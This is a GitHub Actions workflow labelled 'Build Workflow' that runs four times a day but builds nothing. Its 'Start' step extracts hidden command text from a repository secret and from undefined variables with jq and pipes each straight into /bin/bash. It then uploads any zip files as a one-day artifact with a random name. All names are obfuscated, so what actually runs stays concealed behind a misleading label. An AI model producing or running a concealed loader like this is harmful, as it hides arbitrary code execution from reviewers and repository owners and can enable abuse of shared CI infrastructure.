name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '50 0,6,12,18 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Start
        env:
          ltt852: ${{ secrets.ltt852 }}
        run: |
          printf '%s' "$ltt852" | jq -r .ezl29 | /bin/bash
          echo $qau73 | jq -r .xdnzv724 | /bin/bash
          echo $xig7 | jq -r .a02922 | /bin/bash
          printf '%s' "$svnu1" | jq -r .af40 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: PMCAiNUl
          path: "*.zip"
          retention-days: 1
